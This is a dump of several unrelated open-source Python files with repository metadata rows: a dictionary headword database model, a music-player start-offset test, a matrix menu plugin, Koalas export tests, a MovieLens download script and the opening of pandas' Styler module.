plt.ylabel('Speedup Factor')
plt.title(f"different process speedup factor")
plt.savefig(f"./images/{testcase}_diff_proc_line.png")
acfa8b85b770b36461b01ebcb459eaf351e6d25c | 4,760 | py | Python | DictionaryOfNewZealandEnglish/headword/models.py | eResearchSandpit/DictionaryOfNewZealandEnglish | cf3cec34aafc7a9a8bd0413883f5eeb314d46a48 | [
"BSD-3-Clause"
] | null | null | null | DictionaryOfNewZealandEnglish/headword/models.py | eResearchSandpit/DictionaryOfNewZealandEnglish | cf3cec34aafc7a9a8bd0413883f5eeb314d46a48 | [
"BSD-3-Clause"
] | null | null | null | DictionaryOfNewZealandEnglish/headword/models.py | eResearchSandpit/DictionaryOfNewZealandEnglish | cf3cec34aafc7a9a8bd0413883f5eeb314d46a48 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
import datetime as dt
from DictionaryOfNewZealandEnglish.database import (
Column,
db,
Model,
ReferenceCol,
relationship,
SurrogatePK,
)
##############################################
# join tables for many-to-many relationships #
# Association table linking headwords to their supporting citations.
headword_citations = db.Table('headword_citations',
    db.Column('headword_id', db.Integer, db.ForeignKey('headwords.id')),
    db.Column('citation_id', db.Integer, db.ForeignKey('citations.id'))
)
# Association table linking headwords to editorial flags.
headword_flags = db.Table('headword_flags',
    db.Column('headword_id', db.Integer, db.ForeignKey('headwords.id')),
    db.Column('flag_id', db.Integer, db.ForeignKey('flags.id'))
)
# Association table linking headwords to usage registers.
headword_registers = db.Table('headword_registers',
    db.Column('headword_id', db.Integer, db.ForeignKey('headwords.id')),
    db.Column('register_id', db.Integer, db.ForeignKey('registers.id'))
)
class Headword(SurrogatePK, Model):
    """A dictionary headword with its definition, lexical metadata,
    many-to-one category links and many-to-many citation/flag/register
    relations."""
    __tablename__ = "headwords"
    headword = Column(db.String(50), nullable=False)
    definition = Column(db.Text, nullable=False)
    see = Column(db.Text, nullable=True)  # free-text cross-reference
    pronunciation = Column(db.Text, nullable=True)
    notes = Column(db.Text, nullable=True)
    archived = Column(db.Boolean, default=False)  # soft-delete marker
    # Many-to-one category links (all optional).
    data_set_id = ReferenceCol('data_sets', nullable=True)
    data_set = relationship('Data_set', backref='headwords')
    homonym_number_id = ReferenceCol('homonym_numbers', nullable=True)
    homonym_number = relationship('Homonym_number', backref='headwords')
    word_class_id = ReferenceCol('word_classes', nullable=True)
    word_class = relationship('Word_class', backref='headwords')
    sense_number_id = ReferenceCol('sense_numbers', nullable=True)
    sense_number = relationship('Sense_number', backref='headwords')
    origin_id = ReferenceCol('origins', nullable=True)
    origin = relationship('Origin', backref='headwords')
    domain_id = ReferenceCol('domains', nullable=True)
    domain = relationship('Domain', backref='headwords')
    region_id = ReferenceCol('regions', nullable=True)
    region = relationship('Region', backref='headwords')
    # M2M relations (via the association tables declared above).
    citations = relationship('Citation',
                          secondary = headword_citations,
                          backref=db.backref('headwords'),
                          order_by='Citation.archived, Citation.date')
    flags = relationship('Flag',
                          secondary = headword_flags,
                          backref=db.backref('headwords'),
                          order_by='Flag.name')
    registers = relationship('Register',
                          secondary = headword_registers,
                          backref=db.backref('headwords'),
                          order_by='Register.name')
    created_at = Column(db.DateTime, default=dt.datetime.utcnow)
    updated_at = Column(db.DateTime, nullable=False)
    updated_by = Column(db.String(80), nullable=False)
    def __init__(self, headword,
                       definition,
                       see,
                       pronunciation,
                       notes,
                       data_set_id,
                       homonym_number_id,
                       word_class_id,
                       sense_number_id,
                       origin_id,
                       domain_id,
                       region_id,
                       updated_at,
                       updated_by
                       ):
        """Forward all column values to the base model constructor."""
        db.Model.__init__(self, headword =headword,
                                definition =definition,
                                see =see,
                                pronunciation =pronunciation,
                                notes =notes,
                                data_set_id =data_set_id,
                                homonym_number_id=homonym_number_id,
                                word_class_id =word_class_id,
                                sense_number_id =sense_number_id,
                                origin_id =origin_id,
                                domain_id =domain_id,
                                region_id =region_id,
                                updated_at =updated_at,
                                updated_by =updated_by
                                )
    @property
    def full_name(self):
        """Human-readable description used in templates."""
        return "Headword is {0}".format(self.headword)
    @property
    def url_name(self):
        """URL-safe form of the headword.

        NOTE(review): only spaces are escaped; other reserved URL
        characters pass through unchanged -- confirm that headwords can
        never contain them.
        """
        return self.headword.replace(' ', '%20')
    def __repr__(self):
        return '<Headword ({name!r})>'.format(name=self.headword)
| 37.777778 | 75 | 0.532983 |
acfa8c0d38fc8b2cccd1f437a36546795a15f42c | 2,427 | py | Python | tests/test-startOffset.py | amikey/music-player-core | d124f8b43362648501d157a67d203d5f4ef008ad | [
"BSD-2-Clause"
] | 56 | 2015-04-21T05:35:38.000Z | 2021-02-16T13:42:45.000Z | tests/test-startOffset.py | n-peugnet/music-player-core | d124f8b43362648501d157a67d203d5f4ef008ad | [
"BSD-2-Clause"
] | 13 | 2015-05-09T17:36:27.000Z | 2020-02-13T17:44:59.000Z | tests/test-startOffset.py | n-peugnet/music-player-core | d124f8b43362648501d157a67d203d5f4ef008ad | [
"BSD-2-Clause"
] | 27 | 2015-06-15T14:54:58.000Z | 2021-07-22T09:59:40.000Z | #!/usr/bin/env python2
import sys, os, fnmatch, random, pprint, Tkinter
# Our parent path might contain a self-build musicplayer module. Use that one.
sys.path = [os.path.abspath((os.path.dirname(__file__) or ".") + "/..")] + sys.path
import musicplayer
print "Module:", musicplayer.__file__
class Song:
	"""Player-facing song object: a URL, raw-stream accessors, and a
	start offset (the feature this test script exercises)."""
	def __init__(self, fn):
		self.url = fn
		# Open in binary mode: the player consumes raw audio bytes and
		# text mode would corrupt them on platforms that translate
		# newlines (and returns str instead of bytes on Python 3).
		self.f = open(fn, "rb")
		# This is the test: a fixed start offset (presumably seconds)
		# that the player should honor when playback begins.
		self.startOffset = 3.5
	def __eq__(self, other):
		# Two Song objects are "the same song" iff they reference the
		# same file path.
		return self.url == other.url
	def readPacket(self, bufSize):
		"""Return up to bufSize raw bytes from the underlying file."""
		return self.f.read(bufSize)
	def seekRaw(self, offset, whence):
		"""Seek the raw stream and return the new absolute position."""
		self.f.seek(offset, whence)
		return self.f.tell()
files = []
def getFiles(path):
	"""Recursively collect '*.mp3' paths under `path` (in random order)
	into the global `files` list, stopping once we have over 1000."""
	entries = os.listdir(path)
	random_order = sorted(entries, key=lambda _: random.random())
	for name in random_order:
		full = os.path.join(path, name)
		if os.path.isdir(full):
			getFiles(full)  # recurse into subdirectory
		if len(files) > 1000:
			break  # we already have enough
		if fnmatch.fnmatch(full, '*.mp3'):
			files.append(full)
# Seed the playlist from ~/Music; any files given on the command line
# take priority at the front of the list.
getFiles(os.path.expanduser("~/Music"))
random.shuffle(files) # shuffle some more
files = sys.argv[1:] + files
assert files, "give me some files or fill-up ~/Music"
# Index of the song currently handed out by songs() below.
i = 0
def songs():
	"""Endless generator over the global playlist, wrapping at the end.

	Note: the global index `i` is only advanced after a song has been
	consumed, so peekSongs() below can rely on it between yields.
	"""
	global i, files
	while True:
		yield Song(files[i])
		i += 1
		if i >= len(files):
			i = 0
def peekSongs(n):
	"""Return the next n upcoming Songs without advancing playback.

	The result is the map() of Song over a rotated copy of the playlist
	(a list under Python 2, which this script targets).
	"""
	start = i + 1
	if start >= len(files):
		start = 0
	rotated = files[start:] + files[:start]
	return map(Song, rotated[:n])
# Create our Music Player.
player = musicplayer.createPlayer()
player.outSamplerate = 96000 # support high quality :)
player.queue = songs()
player.peekQueue = peekSongs
# Setup a simple GUI.
window = Tkinter.Tk()
window.title("Music Player")
songName = Tkinter.StringVar()
songTime = Tkinter.StringVar()
songLabel = Tkinter.StringVar()
def onSongChange(**kwargs):
	# Called by the player when it advances to a new song.
	songName.set(os.path.basename(player.curSong.url))
	songLabel.set(pprint.pformat(player.curSongMetadata))
def cmdPlayPause(*args): player.playing = not player.playing
def cmdNext(*args): player.nextSong()
def refreshTime():
	# -1 is displayed while position/length are not (yet) known.
	songTime.set("Time: %.1f / %.1f" % (player.curSongPos or -1, player.curSongLen or -1))
	window.after(10, refreshTime) # every 10ms
Tkinter.Label(window, textvariable=songName).pack()
Tkinter.Label(window, textvariable=songTime).pack()
Tkinter.Label(window, textvariable=songLabel).pack()
Tkinter.Button(window, text="Play/Pause", command=cmdPlayPause).pack()
Tkinter.Button(window, text="Next", command=cmdNext).pack()
refreshTime()
player.onSongChange = onSongChange
player.playing = True # start playing
window.mainloop()
acfa8ca1a62f31e89cf19b50a9875db2da7506a6 | 803 | py | Python | src/python33/menuPlugins/rowMajor.py | charlesdaniels/hercm | 6d1053576355cecf1164832a36b77cdce625974c | [
"BSD-3-Clause"
] | null | null | null | src/python33/menuPlugins/rowMajor.py | charlesdaniels/hercm | 6d1053576355cecf1164832a36b77cdce625974c | [
"BSD-3-Clause"
] | 32 | 2015-08-07T14:07:06.000Z | 2016-01-18T16:31:45.000Z | src/python33/menuPlugins/rowMajor.py | charlesdaniels/hercm | 6d1053576355cecf1164832a36b77cdce625974c | [
"BSD-3-Clause"
] | null | null | null | import masterPlugin
## wrapper for libHercMatrix.hercMatrix.makeRowMajor()
class rowMajor(masterPlugin.masterPlugin):
    """Menu command that re-sorts the working matrix's COO data into
    row-major order (matrix contents are unchanged)."""
    def __init__(this):
        super().__init__()
        this.command = "row-major"
        this.aliases = None
        this.commandInfo = {'requiredArguments': None,
            'optionalArguments': None,
            'argumentInfo': None,
            'help': """Makes the matrix row-major (only affects COO data, not
            the contents of the matrix)"""}

    def execute(this, arguments, WORKINGMATRIX):
        """Run makeRowMajor() on the working matrix, with progress output."""
        print("Making the matrix row-major...")
        WORKINGMATRIX.makeRowMajor()
        print("done")

    def validate(this, arguments, WORKINGMATRIX):
        """Delegate validation to the base class (no extra checks here).

        The previous if/return-False/return-True chain collapsed to a
        single boolean return.
        """
        return bool(super().validate(arguments, WORKINGMATRIX))
acfa8ccf7896fd15234220ddfcf5868f2ea4d425 | 5,340 | py | Python | databricks/koalas/tests/test_dataframe_conversion.py | sadikovi/koalas | edc6074b8bc25a787ed175de3b9afbef28d8d721 | [
"Apache-2.0"
] | null | null | null | databricks/koalas/tests/test_dataframe_conversion.py | sadikovi/koalas | edc6074b8bc25a787ed175de3b9afbef28d8d721 | [
"Apache-2.0"
] | null | null | null | databricks/koalas/tests/test_dataframe_conversion.py | sadikovi/koalas | edc6074b8bc25a787ed175de3b9afbef28d8d721 | [
"Apache-2.0"
] | null | null | null | #
# Copyright (C) 2019 Databricks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import string
import numpy as np
import pandas as pd
from databricks import koalas
from databricks.koalas.testing.utils import ReusedSQLTestCase, SQLTestUtils, TestUtils
class DataFrameConversionTest(ReusedSQLTestCase, SQLTestUtils, TestUtils):
    """Checks that Koalas DataFrame export (csv/html/excel) matches pandas."""
    @property
    def pdf(self):
        # Reference pandas frame; note the non-contiguous index [0, 1, 3].
        return pd.DataFrame({
            'a': [1, 2, 3],
            'b': [4, 5, 6],
        }, index=[0, 1, 3])
    @property
    def kdf(self):
        # Koalas twin of `pdf`, rebuilt on each access.
        return koalas.from_pandas(self.pdf)
    @staticmethod
    def strip_all_whitespace(str):
        """A helper function to remove all whitespace from a string."""
        return str.translate({ord(c): None for c in string.whitespace})
    def test_csv(self):
        pdf = self.pdf
        kdf = self.kdf
        self.assert_eq(kdf.to_csv(), pdf.to_csv())
        # NaN / None handling with an explicit na_rep.
        pdf = pd.DataFrame({
            'a': [1, np.nan, 3],
            'b': ["one", "two", None],
        }, index=[0, 1, 3])
        kdf = koalas.from_pandas(pdf)
        self.assert_eq(kdf.to_csv(na_rep='null'), pdf.to_csv(na_rep='null'))
        # Float formatting, plus header/index suppression options.
        pdf = pd.DataFrame({
            'a': [1.0, 2.0, 3.0],
            'b': [4.0, 5.0, 6.0],
        }, index=[0, 1, 3])
        kdf = koalas.from_pandas(pdf)
        self.assert_eq(kdf.to_csv(float_format='%.1f'), pdf.to_csv(float_format='%.1f'))
        self.assert_eq(kdf.to_csv(header=False), pdf.to_csv(header=False))
        self.assert_eq(kdf.to_csv(index=False), pdf.to_csv(index=False))
    def test_to_html(self):
        # Whitespace is stripped on both sides so only the markup matters.
        expected = self.strip_all_whitespace("""
        <table border="1" class="dataframe">
        <thead>
        <tr style="text-align: right;"><th></th><th>a</th><th>b</th></tr>
        </thead>
        <tbody>
        <tr><th>0</th><td>1</td><td>4</td></tr>
        <tr><th>1</th><td>2</td><td>5</td></tr>
        <tr><th>3</th><td>3</td><td>6</td></tr>
        </tbody>
        </table>
        """)
        got = self.strip_all_whitespace(self.kdf.to_html())
        self.assert_eq(got, expected)
        # with max_rows set
        expected = self.strip_all_whitespace("""
        <table border="1" class="dataframe">
        <thead>
        <tr style="text-align: right;"><th></th><th>a</th><th>b</th></tr>
        </thead>
        <tbody>
        <tr><th>0</th><td>1</td><td>4</td></tr>
        <tr><th>1</th><td>2</td><td>5</td></tr>
        </tbody>
        </table>
        """)
        got = self.strip_all_whitespace(self.kdf.to_html(max_rows=2))
        self.assert_eq(got, expected)
    @staticmethod
    def get_excel_dfs(koalas_location, pandas_location):
        # Read both written workbooks back for comparison.
        return {
            'got': pd.read_excel(koalas_location, index_col=0),
            'expected': pd.read_excel(pandas_location, index_col=0)
        }
    def test_to_excel(self):
        with self.temp_dir() as dirpath:
            pandas_location = dirpath + "/" + "output1.xlsx"
            koalas_location = dirpath + "/" + "output2.xlsx"
            pdf = self.pdf
            kdf = self.kdf
            kdf.to_excel(koalas_location)
            pdf.to_excel(pandas_location)
            dataframes = self.get_excel_dfs(koalas_location, pandas_location)
            self.assert_eq(dataframes['got'], dataframes['expected'])
            # None / NaN handling with explicit na_rep.
            pdf = pd.DataFrame({
                'a': [1, None, 3],
                'b': ["one", "two", None],
            }, index=[0, 1, 3])
            kdf = koalas.from_pandas(pdf)
            kdf.to_excel(koalas_location, na_rep='null')
            pdf.to_excel(pandas_location, na_rep='null')
            dataframes = self.get_excel_dfs(koalas_location, pandas_location)
            self.assert_eq(dataframes['got'], dataframes['expected'])
            # Float formatting plus header/index suppression options.
            pdf = pd.DataFrame({
                'a': [1.0, 2.0, 3.0],
                'b': [4.0, 5.0, 6.0],
            }, index=[0, 1, 3])
            kdf = koalas.from_pandas(pdf)
            kdf.to_excel(koalas_location, float_format='%.1f')
            pdf.to_excel(pandas_location, float_format='%.1f')
            dataframes = self.get_excel_dfs(koalas_location, pandas_location)
            self.assert_eq(dataframes['got'], dataframes['expected'])
            kdf.to_excel(koalas_location, header=False)
            pdf.to_excel(pandas_location, header=False)
            dataframes = self.get_excel_dfs(koalas_location, pandas_location)
            self.assert_eq(dataframes['got'], dataframes['expected'])
            kdf.to_excel(koalas_location, index=False)
            pdf.to_excel(pandas_location, index=False)
            dataframes = self.get_excel_dfs(koalas_location, pandas_location)
            self.assert_eq(dataframes['got'], dataframes['expected'])
| 34.901961 | 88 | 0.57191 |
acfa8d8f46d496f21109144def834ec900e9a9c0 | 9,619 | py | Python | official/recommendation/movielens.py | 873040/Abhishek | 2ddd716e66bc5cc6e6f0787508dd07da0e02e75a | [
"Apache-2.0"
] | 12 | 2020-12-13T08:34:24.000Z | 2022-03-20T15:17:17.000Z | official/recommendation/movielens.py | 873040/Abhishek | 2ddd716e66bc5cc6e6f0787508dd07da0e02e75a | [
"Apache-2.0"
] | 10 | 2019-12-28T21:31:19.000Z | 2020-04-12T20:01:58.000Z | official/recommendation/movielens.py | 873040/Abhishek | 2ddd716e66bc5cc6e6f0787508dd07da0e02e75a | [
"Apache-2.0"
] | 8 | 2020-04-12T04:30:33.000Z | 2021-09-17T20:54:44.000Z | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Download and extract the MovieLens dataset from GroupLens website.
Download the dataset, and perform basic preprocessing.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import tempfile
import zipfile
# pylint: disable=g-bad-import-order
import numpy as np
import pandas as pd
import six
from six.moves import urllib # pylint: disable=redefined-builtin
from absl import app as absl_app
from absl import flags
from absl import logging
import tensorflow as tf
# pylint: enable=g-bad-import-order
from official.utils.flags import core as flags_core
# Supported dataset variants and the canonical file names produced after
# preprocessing.
ML_1M = "ml-1m"
ML_20M = "ml-20m"
DATASETS = [ML_1M, ML_20M]
RATINGS_FILE = "ratings.csv"
MOVIES_FILE = "movies.csv"
# URL to download dataset
_DATA_URL = "http://files.grouplens.org/datasets/movielens/"
# Canonical column names used in the regularized csv files.
GENRE_COLUMN = "genres"
ITEM_COLUMN = "item_id" # movies
RATING_COLUMN = "rating"
TIMESTAMP_COLUMN = "timestamp"
TITLE_COLUMN = "titles"
USER_COLUMN = "user_id"
GENRES = [
    'Action', 'Adventure', 'Animation', "Children", 'Comedy', 'Crime',
    'Documentary', 'Drama', 'Fantasy', 'Film-Noir', 'Horror', "IMAX", 'Musical',
    'Mystery', 'Romance', 'Sci-Fi', 'Thriller', 'War', 'Western'
]
N_GENRE = len(GENRES)
# Column orderings matching the raw ratings.dat / movies.dat layouts.
RATING_COLUMNS = [USER_COLUMN, ITEM_COLUMN, RATING_COLUMN, TIMESTAMP_COLUMN]
MOVIE_COLUMNS = [ITEM_COLUMN, TITLE_COLUMN, GENRE_COLUMN]
# Note: Users are indexed [1, k], not [0, k-1]
NUM_USER_IDS = {
    ML_1M: 6040,
    ML_20M: 138493,
}
# Note: Movies are indexed [1, k], not [0, k-1]
# Both the 1m and 20m datasets use the same movie set.
NUM_ITEM_IDS = 3952
MAX_RATING = 5
NUM_RATINGS = {
    ML_1M: 1000209,
    ML_20M: 20000263
}
def _download_and_clean(dataset, data_dir):
  """Download MovieLens dataset in a standard format.

  This function downloads the specified MovieLens format and coerces it into a
  standard format. The only difference between the ml-1m and ml-20m datasets
  after this point (other than size, of course) is that the 1m dataset uses
  whole number ratings while the 20m dataset allows half integer ratings.

  Args:
    dataset: One of DATASETS ("ml-1m" or "ml-20m").
    data_dir: Root directory; regularized files land in <data_dir>/<dataset>/.
  """
  if dataset not in DATASETS:
    raise ValueError("dataset {} is not in {{{}}}".format(
        dataset, ",".join(DATASETS)))
  data_subdir = os.path.join(data_dir, dataset)
  expected_files = ["{}.zip".format(dataset), RATINGS_FILE, MOVIES_FILE]
  tf.io.gfile.makedirs(data_subdir)
  # Skip the download entirely when all expected artifacts already exist.
  if set(expected_files).intersection(
      tf.io.gfile.listdir(data_subdir)) == set(expected_files):
    logging.info("Dataset {} has already been downloaded".format(dataset))
    return
  url = "{}{}.zip".format(_DATA_URL, dataset)
  # Download and regularize into a local temp dir, then copy results over.
  temp_dir = tempfile.mkdtemp()
  try:
    zip_path = os.path.join(temp_dir, "{}.zip".format(dataset))
    zip_path, _ = urllib.request.urlretrieve(url, zip_path)
    statinfo = os.stat(zip_path)
    # A new line to clear the carriage return from download progress
    # logging.info is not applicable here
    print()
    logging.info(
        "Successfully downloaded {} {} bytes".format(
            zip_path, statinfo.st_size))
    zipfile.ZipFile(zip_path, "r").extractall(temp_dir)
    if dataset == ML_1M:
      _regularize_1m_dataset(temp_dir)
    else:
      _regularize_20m_dataset(temp_dir)
    for fname in tf.io.gfile.listdir(temp_dir):
      if not tf.io.gfile.exists(os.path.join(data_subdir, fname)):
        tf.io.gfile.copy(os.path.join(temp_dir, fname),
                         os.path.join(data_subdir, fname))
      else:
        logging.info("Skipping copy of {}, as it already exists in the "
                     "destination folder.".format(fname))
  finally:
    # Always clean up the scratch directory, even on failure.
    tf.io.gfile.rmtree(temp_dir)
def _transform_csv(input_path, output_path, names, skip_first, separator=","):
  """Rewrite a raw ratings/movies file as a comma separated csv with a header.

  Args:
    input_path: Path of the raw input file.
    output_path: Path where the cleaned csv should be written.
    names: Column names written as the header row.
    skip_first: If True, drop the first line of the raw input (its header).
    separator: Field separator used by the raw input file.
  """
  if six.PY2:
    names = [six.ensure_text(n, "utf-8") for n in names]

  with tf.io.gfile.GFile(output_path, "wb") as f_out, \
      tf.io.gfile.GFile(input_path, "rb") as f_in:

    # Header row comes first.
    f_out.write(",".join(names).encode("utf-8"))
    f_out.write(b"\n")

    for line_number, raw_line in enumerate(f_in):
      if skip_first and line_number == 0:
        continue  # ignore existing labels in the csv
      text = six.ensure_text(raw_line, "utf-8", errors="ignore")
      fields = text.split(separator)
      if separator != ",":
        # Quote any field that itself contains a comma so the output
        # remains a valid comma separated csv.
        fields = ['"{}"'.format(field) if "," in field else field
                  for field in fields]
      f_out.write(",".join(fields).encode("utf-8"))
def _regularize_1m_dataset(temp_dir):
  """Convert the extracted ml-1m files into the common csv layout.

  The raw "ratings.dat" has no header and uses "::" separated fields:
    UserID::MovieID::Rating::Timestamp
  with UserIDs in [1, 6040], MovieIDs in [1, 3952], whole-star ratings on a
  5-star scale, UNIX-epoch timestamps, and at least 20 ratings per user.
  The raw "movies.dat" lines have the form:
    MovieID::Title::Genres
  with MovieIDs in [1, 3952].
  """
  working_dir = os.path.join(temp_dir, ML_1M)

  # Both .dat files share the same cleaning recipe; only names/columns differ.
  for raw_name, out_name, columns in (
      ("ratings.dat", RATINGS_FILE, RATING_COLUMNS),
      ("movies.dat", MOVIES_FILE, MOVIE_COLUMNS),
  ):
    _transform_csv(
        input_path=os.path.join(working_dir, raw_name),
        output_path=os.path.join(temp_dir, out_name),
        names=columns, skip_first=False, separator="::")

  tf.io.gfile.rmtree(working_dir)
def _regularize_20m_dataset(temp_dir):
  """Convert the extracted ml-20m files into the common csv layout.

  The raw "ratings.csv" has a header row followed by lines of the form:
    userId,movieId,rating,timestamp
  ordered first by userId then movieId, with half-star ratings in
  [0.5, 5.0], UNIX-epoch timestamps, and at least 20 ratings per user.
  The raw "movies.csv" lines have the form:
    MovieID,Title,Genres
  with MovieIDs in [1, 3952].
  """
  working_dir = os.path.join(temp_dir, ML_20M)

  # Both .csv files share the same cleaning recipe; only names/columns differ.
  for raw_name, out_name, columns in (
      ("ratings.csv", RATINGS_FILE, RATING_COLUMNS),
      ("movies.csv", MOVIES_FILE, MOVIE_COLUMNS),
  ):
    _transform_csv(
        input_path=os.path.join(working_dir, raw_name),
        output_path=os.path.join(temp_dir, out_name),
        names=columns, skip_first=True, separator=",")

  tf.io.gfile.rmtree(working_dir)
def download(dataset, data_dir):
  """Download and clean `dataset` into `data_dir`.

  Args:
    dataset: Name of the dataset to fetch, or a falsy value to fetch all
      datasets in DATASETS.
    data_dir: Root directory under which the cleaned data is stored.
  """
  if dataset:
    _download_and_clean(dataset, data_dir)
  else:
    # Use a plain loop: the original built a throwaway list purely for
    # side effects, which is a comprehension anti-pattern.
    for d in DATASETS:
      _download_and_clean(d, data_dir)
def ratings_csv_to_dataframe(data_dir, dataset):
  """Load the cleaned ratings csv for `dataset` into a pandas DataFrame."""
  ratings_path = os.path.join(data_dir, dataset, RATINGS_FILE)
  with tf.io.gfile.GFile(ratings_path) as f:
    return pd.read_csv(f, encoding="utf-8")
def csv_to_joint_dataframe(data_dir, dataset):
  """Return ratings joined with movie metadata on the item id column."""
  ratings = ratings_csv_to_dataframe(data_dir, dataset)

  movies_path = os.path.join(data_dir, dataset, MOVIES_FILE)
  with tf.io.gfile.GFile(movies_path) as f:
    movies = pd.read_csv(f, encoding="utf-8")

  joined = ratings.merge(movies, on=ITEM_COLUMN)
  # Normalize ratings to float32 so both datasets share one dtype.
  joined[RATING_COLUMN] = joined[RATING_COLUMN].astype(np.float32)
  return joined
def integerize_genres(dataframe):
  """Replace genre string with a binary vector.

  Args:
    dataframe: a pandas dataframe of movie data.

  Returns:
    The transformed dataframe.
  """
  def _map_fn(entry):
    # Bug fix: str.replace returns a new string (strings are immutable); the
    # original discarded the result, so "Children's" was never normalized.
    entry = entry.replace("Children's", "Children")  # naming difference.
    movie_genres = entry.split("|")
    output = np.zeros((len(GENRES),), dtype=np.int64)
    for i, genre in enumerate(GENRES):
      if genre in movie_genres:
        output[i] = 1
    return output

  dataframe[GENRE_COLUMN] = dataframe[GENRE_COLUMN].apply(_map_fn)
  return dataframe
def define_data_download_flags():
  """Add flags specifying data download arguments."""
  # Destination root for the downloaded archives and cleaned csv files.
  flags.DEFINE_string(
      name="data_dir", default="/tmp/movielens-data/",
      help=flags_core.help_wrap(
          "Directory to download and extract data."))
  # Which dataset to fetch; None (the default) means all datasets — see
  # download() which iterates DATASETS when `dataset` is falsy.
  flags.DEFINE_enum(
      name="dataset", default=None,
      enum_values=DATASETS, case_sensitive=False,
      help=flags_core.help_wrap("Dataset to be trained and evaluated."))
def main(_):
  """Download and extract the data from GroupLens website."""
  # `_` is the leftover argv supplied by absl_app.run; it is unused here.
  download(flags.FLAGS.dataset, flags.FLAGS.data_dir)
if __name__ == "__main__":
  # Register flags before absl parses argv, then hand control to main().
  define_data_download_flags()
  FLAGS = flags.FLAGS
  absl_app.run(main)
| 31.029032 | 80 | 0.695291 |
acfa8e955a33583dff8f9e43f597ea36cf0584f5 | 137,627 | py | Python | pandas/io/formats/style.py | Arghya-Banerjee/pandas | 9a4fcea8de798938a434fcaf67a0aa5a46b76b5b | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | pandas/io/formats/style.py | Arghya-Banerjee/pandas | 9a4fcea8de798938a434fcaf67a0aa5a46b76b5b | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | pandas/io/formats/style.py | Arghya-Banerjee/pandas | 9a4fcea8de798938a434fcaf67a0aa5a46b76b5b | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | """
Module for applying conditional formatting to DataFrames and Series.
"""
from __future__ import annotations
from contextlib import contextmanager
import copy
from functools import partial
import operator
from typing import (
Any,
Callable,
Hashable,
Sequence,
)
import warnings
import numpy as np
from pandas._config import get_option
from pandas._typing import (
Axis,
FilePath,
IndexLabel,
Level,
Scalar,
WriteBuffer,
)
from pandas.compat._optional import import_optional_dependency
from pandas.util._decorators import (
Substitution,
doc,
)
from pandas.util._exceptions import find_stack_level
import pandas as pd
from pandas import (
IndexSlice,
RangeIndex,
)
import pandas.core.common as com
from pandas.core.frame import (
DataFrame,
Series,
)
from pandas.core.generic import NDFrame
from pandas.core.shared_docs import _shared_docs
from pandas.io.formats.format import save_to_buffer
jinja2 = import_optional_dependency("jinja2", extra="DataFrame.style requires jinja2.")
from pandas.io.formats.style_render import (
CSSProperties,
CSSStyles,
ExtFormatter,
StylerRenderer,
Subset,
Tooltips,
format_table_styles,
maybe_convert_css_to_tuples,
non_reducing_slice,
refactor_levels,
)
# matplotlib is an optional dependency: it is only required by the
# colormap-based styling helpers guarded through _mpl() below.
try:
    import matplotlib as mpl
    import matplotlib.pyplot as plt
    has_mpl = True
except ImportError:
    has_mpl = False
    # Error template used by _mpl(); formatted with the caller's name.
    no_mpl_message = "{0} requires matplotlib."
@contextmanager
def _mpl(func: Callable):
    """Yield ``(pyplot, matplotlib)`` or raise ImportError naming `func`.

    Guard for styling methods that need matplotlib; the raised message
    includes the calling function's name for a clear user-facing error.
    """
    if not has_mpl:
        raise ImportError(no_mpl_message.format(func.__name__))
    yield plt, mpl
####
# Shared Doc Strings
subset = """
subset : label, array-like, IndexSlice, optional
A valid 2d input to `DataFrame.loc[<subset>]`, or, in the case of a 1d input
or single key, to `DataFrame.loc[:, <subset>]` where the columns are
prioritised, to limit ``data`` to *before* applying the function.
"""
props = """
props : str, default None
CSS properties to use for highlighting. If ``props`` is given, ``color``
is not used.
"""
#
###
class Styler(StylerRenderer):
r"""
Helps style a DataFrame or Series according to the data with HTML and CSS.
Parameters
----------
data : Series or DataFrame
Data to be styled - either a Series or DataFrame.
precision : int, optional
Precision to round floats to. If not given defaults to
``pandas.options.styler.format.precision``.
.. versionchanged:: 1.4.0
table_styles : list-like, default None
List of {selector: (attr, value)} dicts; see Notes.
uuid : str, default None
A unique identifier to avoid CSS collisions; generated automatically.
caption : str, tuple, default None
String caption to attach to the table. Tuple only used for LaTeX dual captions.
table_attributes : str, default None
Items that show up in the opening ``<table>`` tag
in addition to automatic (by default) id.
cell_ids : bool, default True
If True, each cell will have an ``id`` attribute in their HTML tag.
The ``id`` takes the form ``T_<uuid>_row<num_row>_col<num_col>``
where ``<uuid>`` is the unique identifier, ``<num_row>`` is the row
number and ``<num_col>`` is the column number.
na_rep : str, optional
Representation for missing values.
If ``na_rep`` is None, no special formatting is applied, and falls back to
``pandas.options.styler.format.na_rep``.
.. versionadded:: 1.0.0
uuid_len : int, default 5
If ``uuid`` is not specified, the length of the ``uuid`` to randomly generate
expressed in hex characters, in range [0, 32].
.. versionadded:: 1.2.0
decimal : str, optional
Character used as decimal separator for floats, complex and integers. If not
given uses ``pandas.options.styler.format.decimal``.
.. versionadded:: 1.3.0
thousands : str, optional, default None
Character used as thousands separator for floats, complex and integers. If not
given uses ``pandas.options.styler.format.thousands``.
.. versionadded:: 1.3.0
escape : str, optional
